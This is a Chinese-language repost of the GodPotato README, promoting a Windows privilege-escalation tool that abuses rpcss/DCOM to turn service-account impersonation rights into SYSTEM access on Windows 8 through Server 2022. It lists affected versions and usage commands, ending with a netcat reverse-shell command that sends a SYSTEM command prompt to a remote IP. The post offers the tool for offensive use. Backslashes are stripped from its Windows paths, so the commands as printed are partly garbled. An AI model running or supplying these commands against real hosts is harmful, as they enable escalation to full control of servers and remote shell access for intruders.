来源:https://github.com/BeichenDream/GodPotato
基于Potato提权6年的历史,从RottenPotato开始到JuicyPotatoNG结束,我通过研究DCOM发现了一个新技术,可以在Windows 2012-Windows 2022中实现提权。
rpcss在处理oxid时存在一些缺陷,rpcss是系统必须开启的服务,因此它几乎可以在任何 Windows 操作系统上运行,我将其命名为 GodPotato。
现在只要你有” ImpersonatePrivilege”权限,那你就是“NT AUTHORITYSYSTEM”,通常WEB服务和数据库服务都有“ImpersonatePrivilege”权限。
受影响版本:
Windows8 - Windows 11
Windows Server 2012 - Windows Server 2022
FFFFF FFF FFFFFFF
FFFFFFF FFF FFFFFFFF
FFF FFFF FFF FFF FFF FFF FFF
FFF FFF FFF FFF FFF FFF FFF
FFF FFF FFF FFF FFF FFF FFF
FFFF FFFFFFF FFFFFFFF FFF FFF FFFFFFF FFFFFFFFF FFFFFF FFFFFFFFF FFFFFF
FFFF FFFF FFFF FFF FFFF FFF FFFF FFFF FFFF FFF FFF FFF FFF FFF FFFF
FFFF FFFFF FFF FFF FFF FFF FFFFFFFF FFF FFF FFF F FFF FFF FFF FFF
FFFF FFF FFF FFFFFFF FFF FFF FFFF FFF FFF FFFFF FFF FFF FFFF
FFFF FFF FFF FFFFFFF FFF FFF FFFF FFF FFF FFFFFFFF FFF FFF FFFF
FFF FFF FFF FFF FFF FFF FFF FFF FFF FFF FFFF FFF FFF FFF FFFF
FFFF FFFF FFFF FFF FFFF FFF FFF FFF FFFF FFF FFFF FFF FFF FFFF FFF
FFFFFFFF FFFFFFF FFFFFFFF FFF FFFFFFF FFFFFF FFFFFFFF FFFFFFF FFFFFFF
FFFFFFF FFFFF FFFFFFF FFF FFFFF FFFFF FFFFFFFF FFFF FFFF
Arguments:
Required:True CommandLine (default cmd /c whoami)
Example:
GodPotato -cmd "cmd /c whoami"
使用程序内置的Clsid进行权限升级,执行一个简单的命令
GodPotato -cmd "cmd /c whoami"
定制Clsid和执行命令
GodPotato -cmd "cmd /c whoami"
执行反向的shell命令
GodPotato -cmd "nc -t -e C:WindowsSystem32cmd.exe 192.168.1.102 2012"
原文始发于微信公众号(Khan安全攻防实验室):神兵利器丨GodPotato新版土豆提权
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论